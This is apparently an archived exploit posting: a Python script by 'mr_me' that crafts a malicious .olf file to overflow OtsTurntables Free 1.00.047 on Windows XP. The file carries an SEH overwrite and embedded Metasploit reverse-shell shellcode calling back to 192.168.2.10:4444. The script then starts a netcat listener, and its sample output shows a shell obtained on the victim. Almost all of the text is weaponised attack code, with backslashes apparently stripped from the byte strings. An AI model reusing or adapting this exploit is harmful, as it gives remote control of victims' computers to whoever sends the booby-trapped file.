ots100047-overflow.txt
Posted on 16 February 2010
#!/usr/bin/python # # ################################################################### # # OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit # Date: 14-01-2010 # Author: mr_me # Software Link: http://www.otsturntables.com/download-otsturntables-free/ # Version: 1.00.047 # Tested on: Windows XP sp3 # Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz # bad chars: 'x00x0axbdx0dx20' # # ** For educational purposes only ** # # #################################################################### # # ~! I want to go back to the matrix !~ # # mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf # # [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit # [+] Creating exploit file.. # [+] Writing 15000 bytes to awsome-electro.olf.. ph33r # [+] Send awsome-electro.olf to your target # [+] Waiting for a shell on port: 4444 # listening on [any] 4444 ... # 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out # connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:OtsLabsLists> # import sys, os def banner(): print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit" if len(sys.argv) < 3: banner() print "[?] Usage: " + sys.argv[0] + " <port> <filename>" sys.exit(1) port = sys.argv[1] filename = sys.argv[2] # windows/shell_reverse_tcp - 310 bytes # http://www.metasploit.com # Encoder: x86/fnstenv_mov # LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444 shell = ("x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x47x4b" "x25x9ax83xebxfcxe2xf4xbbx21xcexd7xafxb2xdax65" "xb8x2bxaexf6x63x6fxaexdfx7bxc0x59x9fx3fx4axca" "x11x08x53xaexc5x67x4axcexd3xccx7fxaex9bxa9x7a" "xe5x03xebxcfxe5xeex40x8axefx97x46x89xcex6ex7c" "x1fx01xb2x32xaexaexc5x63x4axcexfcxccx47x6ex11" "x18x57x24x71x44x67xaex13x2bx6fx39xfbx84x7axfe" "xfexccx08x15x11x07x47xaexeax5bxe6xaexdax4fx15" "x4dx14x09x45xc9xcaxb8x9dx43xc9x21x23x16xa8x2f" "x3cx56xa8x18x1fxdax4ax2fx80xc8x66x7cx1bxdax4c" "x18xc2xc0xfcxc6xa6x2dx98x12x21x27x65x97x23xfc" "x93xb2xe6x72x65x91x18x76xc9x14x08x76xd9x14xb4" "xf5xf2x87xe3x27x90x21x23x34xc6x21x18xacx7bxd2" "x23xc9x63xedx2bx72x65x91x21x35xcbx12xb4xf5xfc" "x2dx2fx43xf2x24x26x4fxcax1ex62xe9x13xa0x21x61" "x13xa5x7axe5x69xedxdexacx67xb9x09x08x64x05x67" "xa8xe0x7fxe0x8ex31x2fx39xdbx29x51xb4x50xb2xb8" "x9dx7excdx15x1ax74xcbx2dx4ax74xcbx12x1axdax4a" "x2fxe6xfcx9fx89x18xdax4cx2dxb4xdaxadxb8x9bx4d" "x7dx3ex8dx5cx65x32x4fxdax4cxb8x3cxd9x65x97x23" "xd5x10x43x14x76x65x91xb4xf5x9a"); exploit = "x41" * 900 exploit += "xebx06x90x90" exploit += "x46x79x23x01" # CALL DWORD PTR SS:[ESP+2c] exploit += "x90" * 30 exploit += shell exploit += "x41" * (15000-len(exploit)) banner() try: print "[+] Creating exploit file.." print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r" print "[+] Send " + filename + " to your target" turntable = open(filename,'w'); turntable.write(exploit); turntable.close(); print "[+] Waiting for a shell on port: " + port os.system('nc -lvp ' + port) except: print "[-] Error: You do not have correct permissions.."